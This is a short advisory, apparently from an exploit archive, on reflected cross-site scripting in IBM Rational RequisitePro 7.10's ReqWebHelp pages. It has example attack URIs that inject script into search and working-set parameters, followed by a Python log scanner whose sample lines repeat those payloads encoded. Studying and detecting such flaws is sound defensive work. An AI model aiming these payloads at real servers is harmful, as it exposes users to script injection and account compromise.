# Title : IBM Rational RequisitePro 7.10 and ReqWebHelp Multiple Cross Site Scripting
# Published : 2009-10-15
# Author : IBM
Attackers can exploit these issues by enticing an unsuspecting victim into following a malicious URI.
The following example URIs are available:
http://www.example.com/ReqWebHelp/advanced/workingSet.jsp?operation=add*/--></script><script>alert(289325)</script>&workingSet=
http://www.example.com/ReqWebHelp/basic/searchView.jsp?searchWord=>''><script>alert(306531)</script>&maxHits=>''><script>alert(306531)</script>&scopedSearch=>''><script>alert(306531)</script>&scope=>''><script>alert(306531)</script>
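
Requests of this shape can be found in web server access logs. The following is an added example, not part of the original advisory: it flags requests to the two JSP pages above whose listed parameters decode to markup characters. The combined log format, the sample lines and the name flag_requests are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Endpoints and parameters from the example URIs in this advisory, paths lower-cased
# (assumption: the server may match JSP paths case-insensitively).
WATCHED = {
    "/reqwebhelp/advanced/workingset.jsp": {"operation", "workingSet"},
    "/reqwebhelp/basic/searchview.jsp": {"searchWord", "maxHits", "scopedSearch", "scope"},
}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Angle brackets or a script-comment terminator, as used by the example payloads.
MARKUP = re.compile(r"[<>]|\*/")


def flag_requests(log_lines):
    """Return (line_no, path, param) for each watched parameter carrying markup."""
    hits = []
    for no, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        params = WATCHED.get(url.path.lower())
        if params is None:
            continue
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            # parse_qsl decodes once; unquote again to catch double encoding.
            if name in params and MARKUP.search(unquote(value)):
                hits.append((no, url.path, name))
    return hits


# Constructed access-log lines, not taken from a real system.
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Oct/2009:10:00:01 +0000] "GET /ReqWebHelp/basic/searchView.jsp?searchWord=traceability&maxHits=50 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [15/Oct/2009:10:02:17 +0000] "GET /ReqWebHelp/basic/searchView.jsp?searchWord=%3E%27%27%3E%3Cscript%3Ealert(306531)%3C/script%3E&maxHits=50 HTTP/1.1" 200 5301',
    '192.0.2.44 - - [15/Oct/2009:10:02:30 +0000] "GET /ReqWebHelp/advanced/workingSet.jsp?operation=add*/--%3E%3C/script%3E%3Cscript%3Ealert(289325)%3C/script%3E&workingSet= HTTP/1.1" 200 2044',
    '192.0.2.44 - - [15/Oct/2009:10:03:02 +0000] "GET /ReqWebHelp/basic/searchView.jsp?searchWord=x&scope=%253Cscript%253E HTTP/1.1" 200 5120',
    '192.0.2.10 - - [15/Oct/2009:10:04:00 +0000] "GET /other/page.jsp?q=%3Cb%3E HTTP/1.1" 200 310',
]

if __name__ == "__main__":
    for hit in flag_requests(SAMPLE_LOG):
        print(hit)
```

A hit means markup reached a reflected parameter, not that script executed; a legitimate search term containing "<" or ">" will also be flagged.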